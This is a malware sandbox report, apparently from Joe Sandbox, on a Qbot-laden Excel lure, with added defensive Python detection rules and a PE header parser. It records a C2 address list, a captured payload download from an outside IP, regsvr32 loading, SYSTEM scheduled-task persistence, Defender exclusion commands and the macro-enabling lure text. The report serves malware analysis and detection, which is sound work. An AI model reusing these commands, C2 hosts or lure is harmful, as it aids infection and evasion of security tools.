
Windows Analysis Report CompensationClaim-1033191014-09282021.xls

Overview

General Information

Sample Name: CompensationClaim-1033191014-09282021.xls
Analysis ID: 492656
MD5: 6c81ae06a5a6b766edca78e79caa44e9
SHA1: 62771a1cf905d4346cc5d0a764eaf55e685a61d9
SHA256: b3e63f41617ed5bd3bb77a130be65bbbc500e927e7b21425d3d1fb484a7485bb
Tags: xls

Detection

Hidden Macro 4.0 Qbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Qbot
Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Office process drops PE file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Regsvr32 Command Line Without DLL
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Uses reg.exe to modify the Windows registry
Document contains embedded VBA macros
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2752 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 3048 cmdline: regsvr32 -silent ..\Drezd.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2960 cmdline: -silent ..\Drezd.red MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 2980 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
          • schtasks.exe (PID: 2932 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pajjxwey /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:10 /ET 22:22 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • regsvr32.exe (PID: 2920 cmdline: regsvr32 -silent ..\Drezd1.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2976 cmdline: regsvr32 -silent ..\Drezd2.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • regsvr32.exe (PID: 672 cmdline: regsvr32.exe -s 'C:\Users\user\Drezd.red' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 408 cmdline: -s 'C:\Users\user\Drezd.red' MD5: 432BE6CF7311062633459EEF6B242FB5)
      • explorer.exe (PID: 2136 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
        • reg.exe (PID: 2132 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Ciwuywu' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
        • reg.exe (PID: 2680 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Uvelq' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
  • regsvr32.exe (PID: 2116 cmdline: regsvr32.exe -s 'C:\Users\user\Drezd.red' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2848 cmdline: -s 'C:\Users\user\Drezd.red' MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup

Malware Configuration

Threatname: Qbot

{"Bot id": "obama105", "Campaign": "1632819007", "Version": "402.343", "C2 list": ["120.150.218.241:995", "95.77.223.148:443", "185.250.148.74:443", "181.118.183.94:443", "105.198.236.99:443", "140.82.49.12:443", "37.210.152.224:995", "89.101.97.139:443", "81.241.252.59:2078", "27.223.92.142:995", "81.250.153.227:2222", "73.151.236.31:443", "47.22.148.6:443", "122.11.220.212:2222", "120.151.47.189:443", "199.27.127.129:443", "216.201.162.158:443", "136.232.34.70:443", "76.25.142.196:443", "75.66.88.33:443", "45.46.53.140:2222", "173.25.166.81:443", "103.148.120.144:443", "173.21.10.71:2222", "186.18.205.199:995", "71.74.12.34:443", "67.165.206.193:993", "47.40.196.233:2222", "68.204.7.158:443", "47.40.196.233:2222", "24.229.150.54:995", "109.12.111.14:443", "177.130.82.197:2222", "72.252.201.69:443", "24.55.112.61:443", "24.139.72.117:443", "187.156.138.172:443", "71.80.168.245:443", "196.217.156.63:995", "82.77.137.101:995", "173.234.155.233:443", "75.188.35.168:443", "5.238.149.235:61202", "73.77.87.137:443", "182.176.112.182:443", "96.37.113.36:993", "162.244.227.34:443", "92.59.35.196:2222", "196.218.227.241:995", "68.207.102.78:443", "2.188.27.77:443", "189.210.115.207:443", "181.163.96.53:443", "75.107.26.196:465", "185.250.148.74:2222", "68.186.192.69:443"]}

Yara Overview

Initial Sample

Source | Rule | Description | Author
CompensationClaim-1033191014-09282021.xls | JoeSecurity_HiddenMacro | Yara detected hidden Macro 4.0 in Excel | Joe Security

Memory Dumps

Source | Rule | Description | Author
00000006.00000002.617600278.0000000010001000.00000040.00020000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
00000006.00000002.615656945.00000000003D0000.00000004.00000001.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
0000000D.00000002.634139082.0000000010001000.00000040.00020000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
00000007.00000002.881366079.0000000000080000.00000040.00020000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
0000000E.00000002.881374188.00000000000C0000.00000040.00020000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
(1 further entry not expanded in the report)

Unpacked PEs

Source | Rule | Description | Author
6.2.regsvr32.exe.3d0000.0.raw.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
7.2.explorer.exe.80000.0.raw.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
13.2.regsvr32.exe.2a0000.0.raw.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
13.2.regsvr32.exe.2a0000.0.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
14.2.explorer.exe.c0000.0.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
(1 further entry not expanded in the report)

                        Sigma Overview

                        System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started
Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team
Data:
  Command: regsvr32 -silent ..\Drezd.red
  CommandLine: regsvr32 -silent ..\Drezd.red
  CommandLine|base64offset|contains: ,
  Image: C:\Windows\System32\regsvr32.exe
  NewProcessName: C:\Windows\System32\regsvr32.exe
  OriginalFileName: C:\Windows\System32\regsvr32.exe
  ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
  ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
  ParentProcessId: 2752
  ProcessCommandLine: regsvr32 -silent ..\Drezd.red
  ProcessId: 3048

Sigma detected: Regsvr32 Command Line Without DLL
Source: Process started
Author: Florian Roth
Data:
  Command: -silent ..\Drezd.red
  CommandLine: -silent ..\Drezd.red
  CommandLine|base64offset|contains: (empty)
  Image: C:\Windows\SysWOW64\regsvr32.exe
  NewProcessName: C:\Windows\SysWOW64\regsvr32.exe
  OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe
  ParentCommandLine: regsvr32 -silent ..\Drezd.red
  ParentImage: C:\Windows\System32\regsvr32.exe
  ParentProcessId: 3048
  ProcessCommandLine: -silent ..\Drezd.red
  ProcessId: 2960

                        Persistence and Installation Behavior:

Sigma detected: Schedule system process
Source: Process started
Author: Joe Security
Data:
  Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pajjxwey /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:10 /ET 22:22
  CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pajjxwey /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:10 /ET 22:22
  CommandLine|base64offset|contains: *j
  Image: C:\Windows\SysWOW64\schtasks.exe
  NewProcessName: C:\Windows\SysWOW64\schtasks.exe
  OriginalFileName: C:\Windows\SysWOW64\schtasks.exe
  ParentCommandLine: C:\Windows\SysWOW64\explorer.exe
  ParentImage: C:\Windows\SysWOW64\explorer.exe
  ParentProcessId: 2980
  ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pajjxwey /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:10 /ET 22:22
  ProcessId: 2932
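The three Sigma hits above, plus two behaviours visible only in the process tree (regsvr32 handed a file without a library extension, and regsvr32 spawning a SysWOW64 explorer.exe that then writes Defender exclusions), can be expressed as a handful of rules over process-creation events. The Python below is an added example and is not part of the Joe Sandbox report or of any Sigma rule set: it builds constructed Sysmon-style event dictionaries from the PIDs and command lines in the tree above (the report renders quotes as single quotes, so the tokenizer treats those as quoting), adds one invented benign regsvr32 invocation (PID 9001) as a control, and runs the rules over them. The field names, rule names and the LOLBin and Office lists are this example's own assumptions.

```python
"""Process-creation rules for the regsvr32 / schtasks / reg.exe chain in this report."""
import re
from pathlib import PureWindowsPath

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
LOLBINS = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe", "cscript.exe",
           "powershell.exe", "cmd.exe", "certutil.exe"}
LIBRARY_EXTS = {".dll", ".ocx", ".ax", ".cpl"}  # what regsvr32 is normally asked to load
_TOKEN = re.compile(r"""'[^']*'|"[^"]*"|\S+""")


def _base(path):
    """Lower-cased file name of a Windows path, surrounding quotes stripped."""
    return PureWindowsPath(path.strip("'\"")).name.lower()


def _tokens(cmdline):
    """Split a command line; a quoted run is one token, quotes removed."""
    return [t.strip("'\"") for t in _TOKEN.findall(cmdline)]


def rule_office_spawns_lolbin(e):
    if _base(e["ParentImage"]) in OFFICE_APPS and _base(e["Image"]) in LOLBINS:
        return f"{_base(e['ParentImage'])} started {_base(e['Image'])}"
    return None


def rule_regsvr32_non_dll(e):
    if _base(e["Image"]) != "regsvr32.exe":
        return None
    # Anything that is neither a switch nor the program name is a load target.
    # The SysWOW64 child in the report carries no argv[0] at all, so do not skip token 0.
    targets = [t for t in _tokens(e["CommandLine"])
               if not t.startswith(("-", "/")) and _base(t) not in ("regsvr32", "regsvr32.exe")]
    odd = [t for t in targets if PureWindowsPath(t).suffix.lower() not in LIBRARY_EXTS]
    return f"regsvr32 asked to load {odd}" if odd else None


def rule_lolbin_spawns_explorer(e):
    if _base(e["Image"]) == "explorer.exe" and _base(e["ParentImage"]) in LOLBINS:
        return f"explorer.exe started by {_base(e['ParentImage'])} (injection host)"
    return None


def rule_schtasks_system_lolbin(e):
    if _base(e["Image"]) != "schtasks.exe":
        return None
    low = e["CommandLine"].lower()
    runs_as_system = re.search(r"/ru\s+'?(?:nt authority\\)?system'?", low)
    # /tr value is quoted and may contain escaped quotes, as in the report.
    action = re.search(r"/tr\s+'((?:\\'|[^'])*)'", e["CommandLine"], re.IGNORECASE)
    if "/create" in low and runs_as_system and action:
        program = (_tokens(action.group(1)) or [""])[0]
        if _base(program) in LOLBINS:
            return f"task runs as SYSTEM: {action.group(1)}"
    return None


def rule_defender_exclusion(e):
    if _base(e["Image"]) == "reg.exe":
        low = e["CommandLine"].lower()
        if " add " in low and r"windows defender\exclusions" in low:
            return "Defender exclusion written with reg.exe"
    return None


RULES = [rule_office_spawns_lolbin, rule_regsvr32_non_dll, rule_lolbin_spawns_explorer,
         rule_schtasks_system_lolbin, rule_defender_exclusion]


def evaluate(events):
    """Return (rule name, ProcessId, reason) for every rule that fires on every event."""
    hits = []
    for e in events:
        for rule in RULES:
            reason = rule(e)
            if reason:
                hits.append((rule.__name__, e["ProcessId"], reason))
    return hits


EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
# Constructed events: PIDs and command lines copied from the process tree in the report,
# plus one benign regsvr32 registration (PID 9001) invented as a control.
EVENTS = [
    {"ProcessId": 3048, "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 -silent ..\Drezd.red", "ParentImage": EXCEL},
    {"ProcessId": 2960, "Image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "CommandLine": r"-silent ..\Drezd.red", "ParentImage": r"C:\Windows\System32\regsvr32.exe"},
    {"ProcessId": 2980, "Image": r"C:\Windows\SysWOW64\explorer.exe",
     "CommandLine": r"C:\Windows\SysWOW64\explorer.exe", "ParentImage": r"C:\Windows\SysWOW64\regsvr32.exe"},
    {"ProcessId": 2932, "Image": r"C:\Windows\SysWOW64\schtasks.exe",
     "CommandLine": r"'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn pajjxwey "
                    r"/tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 22:10 /ET 22:22",
     "ParentImage": r"C:\Windows\SysWOW64\explorer.exe"},
    {"ProcessId": 2132, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' "
                    r"/f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Ciwuywu' /d '0'",
     "ParentImage": r"C:\Windows\SysWOW64\explorer.exe"},
    {"ProcessId": 9001, "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /s 'C:\Program Files\Vendor\vendor.dll'",
     "ParentImage": r"C:\Windows\System32\msiexec.exe"},
]

if __name__ == "__main__":
    for name, pid, reason in evaluate(EVENTS):
        print(f"{name:28} PID {pid}: {reason}")
```

The regsvr32 rule deliberately keys on the load target's extension rather than on the `-silent`/`-s` switch: the switch is what a legitimate installer passes as well, whereas a `.red` or `.dat` argument has no benign reason to exist. The control event shows the rules stay quiet for a quoted path to a real `.dll` under an installer parent.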

                        Jbx Signature Overview


                        AV Detection:

Found malware configuration
Source: 14.2.explorer.exe.c0000.0.unpack, Malware Configuration Extractor: Qbot (the extracted configuration is the one listed under Malware Configuration above)
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.9218096065[1].dat, ReversingLabs: Detection: 15%
Source: 13.2.regsvr32.exe.1310000.7.unpack, Avira: Label: TR/Crypt.XPACK.Gen2
Source: 6.2.regsvr32.exe.2a80000.7.unpack, Avira: Label: TR/Crypt.XPACK.Gen2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: amstream.pdb, source: explorer.exe, 00000007.00000003.618389279.00000000026B0000.00000004.00000040.sdmp, explorer.exe, 0000000E.00000003.634893726.0000000001350000.00000004.00000040.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 6_2_1000AEB4 FindFirstFileW,FindNextFileW,
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 7_2_0008AEB4 FindFirstFileW,FindNextFileW,
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 13_2_1000AEB4 FindFirstFileW,FindNextFileW,
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 14_2_000CAEB4 FindFirstFileW,FindNextFileW,

                        Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: 44467.9218096065[1].dat.0.dr
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\System32\regsvr32.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll, origin: URLDownloadToFileA
Source: global traffic, TCP traffic: 192.168.2.22:49165 -> 190.14.37.187:80
Source: global traffic, TCP traffic: 192.168.2.22:49165 -> 190.14.37.187:80
Source: global traffic, HTTP traffic detected:
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 28 Sep 2021 20:07:48 GMT
Content-Type: application/octet-stream
Content-Length: 259072
Connection: keep-alive
X-Powered-By: PHP/5.4.16
Accept-Ranges: bytes
Expires: 0
Cache-Control: no-cache, no-store, must-revalidate
Content-Disposition: attachment; filename="44467.9218096065.dat"
Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 16 03 00 00 da 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 27 06 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 30 03 00 70 00 00 00 f4 60 27 06 7c 01 00 00 00 70 27 06 d8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 27 06 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6a 14 03 00 00 10 00 00 00 16 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 30 03 00 00 02 00 00 00 1a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 10 00 00 00 40 03 00 00 60 00 00 00 1c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 30 06 24 06 00 50 03 00 00 68 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 74 00 6e 07 00 00 00 60 27 06 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d8 07 00 00 00 70 27 06 00 08 00 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 (the remainder of the captured bytes is zero padding)
Source: global traffic, HTTP traffic detected:
GET /44467.9218096065.dat HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 190.14.37.187
Connection: Keep-Alive
Source: unknown, TCP traffic detected without corresponding DNS query: 190.14.37.187 (reported 50 times)
Source: regsvr32.exe, 00000006.00000002.616250434.00000000024B0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.881681374.0000000002040000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.633036346.0000000000F20000.00000002.00020000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000005.00000002.619032737.0000000001D10000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.615803827.0000000001FA0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.619851177.0000000001CD0000.00000002.00020000.sdmp, regsvr32.exe, 0000000A.00000002.620572592.0000000001D10000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.635427701.0000000000910000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.632565051.00000000009E0000.00000002.00020000.sdmp, String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000006.00000002.616250434.00000000024B0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.881681374.0000000002040000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.633036346.0000000000F20000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000002.881594655.0000000000E00000.00000002.00020000.sdmp, String found in binary or memory: http://www.%s.comPA
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.9218096065[1].dat
Source: global traffic, HTTP traffic detected: GET /44467.9218096065.dat HTTP/1.1 (the same request, with the MSIE 7.0 User-Agent, shown in full above)
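The response above is served as a `.dat` attachment, yet its body starts with `4d 5a` and a "This program cannot be run in DOS mode" stub. The Python below is an added example, not part of the Joe Sandbox report: it transcribes the header bytes from the Data Raw dump above (zero runs generated rather than copied), parses the DOS, COFF, optional and section headers, and shows what regsvr32 is later asked to load: a 32-bit PE with the DLL characteristic, six sections whose raw data ends exactly at the 259072 bytes announced in Content-Length, and a SizeOfImage of about 100 MB. The hex constant and the helper names are this example's own; the 259072 figure and all header values come from the report.

```python
"""Parse the PE headers captured in the HTTP 200 response body."""
import struct
from datetime import datetime, timezone

IMAGE_FILE_MACHINE_I386 = 0x14C
IMAGE_FILE_DLL = 0x2000
CONTENT_LENGTH = 259072  # Content-Length header of the same response

# Header bytes transcribed from the "Data Raw" dump in the report, grouped by
# structure so each field can be checked against it (zero runs are generated).
CAPTURED_HEX = " ".join([
    # IMAGE_DOS_HEADER (0x00-0x3f), e_lfanew = 0x80
    "4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00",
    "00 " * 32 + "80 00 00 00",
    # DOS stub (0x40-0x7f)
    "0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f",
    "74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00",
    # "PE\0\0" + IMAGE_FILE_HEADER (0x80-0x97): i386, 6 sections, characteristics 0x2102
    "50 45 00 00 4c 01 06 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21",
    # IMAGE_OPTIONAL_HEADER32 fixed part (0x98-0xf7); SizeOfImage = 0x06278000
    "0b 01 03 01 00 16 03 00 00 da 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 03 00 00 00 00 10",
    "00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 27 06 00 04 00 00",
    "00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00",
    # 16 data directories (0xf8-0x177): export, import, resource, ..., IAT at index 12
    "00 30 03 00 70 00 00 00 f4 60 27 06 7c 01 00 00 00 70 27 06 d8 07 00 00",
    "00 " * 72 + "00 60 27 06 f4 00 00 00 " + "00 " * 24,
    # six IMAGE_SECTION_HEADERs (0x178-0x267), 40 bytes each
    "2e 74 65 78 74 00 00 00 6a 14 03 00 00 10 00 00 00 16 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60",
    "2e 65 64 61 74 61 00 00 70 00 00 00 00 30 03 00 00 02 00 00 00 1a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40",
    "2e 64 61 74 61 00 00 00 00 10 00 00 00 40 03 00 00 60 00 00 00 1c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0",
    "2e 64 61 74 61 00 00 00 30 06 24 06 00 50 03 00 00 68 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0",
    "2e 72 64 61 74 61 74 00 6e 07 00 00 00 60 27 06 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0",
    "2e 72 73 72 63 00 00 00 d8 07 00 00 00 70 27 06 00 08 00 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40",
])
CAPTURED = bytes.fromhex(CAPTURED_HEX)


def parse_pe_headers(data):
    """Parse DOS/COFF/optional headers and the section table from a PE prefix.

    Only the header region is needed, so a truncated capture is enough; the
    section raw pointers give the file size the headers imply.
    """
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    (machine, n_sections, timestamp, _symtab, _nsyms,
     opt_size, characteristics) = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 optional headers handled here")
    size_of_image = struct.unpack_from("<I", data, opt + 56)[0]
    sections = []
    for i in range(n_sections):
        (name, vsize, va, raw_size, raw_ptr, _reloc, _lines, _nreloc, _nlines,
         flags) = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": vsize, "virtual_address": va,
                         "raw_size": raw_size, "raw_ptr": raw_ptr, "characteristics": flags})
    return {
        "machine": machine,
        "is_dll": bool(characteristics & IMAGE_FILE_DLL),
        "timestamp": datetime.fromtimestamp(timestamp, tz=timezone.utc),
        "size_of_image": size_of_image,
        "sections": sections,
        # Highest raw end offset is the file size the section table describes.
        "implied_file_size": max(s["raw_ptr"] + s["raw_size"] for s in sections),
    }


def extension_mismatch(filename, data):
    """True when the content is a PE image but the file name does not say so."""
    pe_exts = (".exe", ".dll", ".sys", ".ocx", ".scr", ".cpl")
    return data[:2] == b"MZ" and not filename.lower().endswith(pe_exts)


if __name__ == "__main__":
    hdr = parse_pe_headers(CAPTURED)
    print(f"machine={hdr['machine']:#x} dll={hdr['is_dll']} built={hdr['timestamp']:%Y-%m-%d %H:%M:%SZ}")
    print(f"on wire: {hdr['implied_file_size']} bytes, in memory: {hdr['size_of_image']:#x}")
    for s in hdr["sections"]:
        print(f"  {s['name']:8} va={s['virtual_address']:#010x} vsize={s['virtual_size']:#010x} raw={s['raw_size']:#07x}")
    print("served as .dat but is a PE:", extension_mismatch("44467.9218096065.dat", CAPTURED))
```

The same headers explain the gap between the 259072 bytes on the wire and the image a loader builds: the second `.data` section declares a VirtualSize of 0x06240630 with only 0x6800 bytes of raw data, which pushes SizeOfImage to 0x06278000. A loader honours the large virtual size; a scanner that only reads the file does not see that space, which is one reason the dropped `.red` copy and the unpacked memory dumps in this report are detected by different engines.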

                        System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4, Screenshot OCR: Enable editing" 20 from the yellow bar above. 21 example of notification 22 23 ( 0 PROTECTH)WARN
Source: Screenshot number: 4, Screenshot OCR: Enable Content" to perform Miscrosoft Excel Decryption Core to start the 27 decryption of the docum
Source: Screenshot number: 4, Screenshot OCR: Enable Macros ) 32 33 :: Why I can not open th"s document? 36 37 - You are using iOS or Android
Source: Document image extraction number: 0, Screenshot OCR: Enable editing" from the yellow bar above. example of notification ( 0 ~ECTHWARNING This file ori
Source: Document image extraction number: 0, Screenshot OCR: Enable Content" to perform Miscrosoft Excel Decryption Core to start the decryption of the document
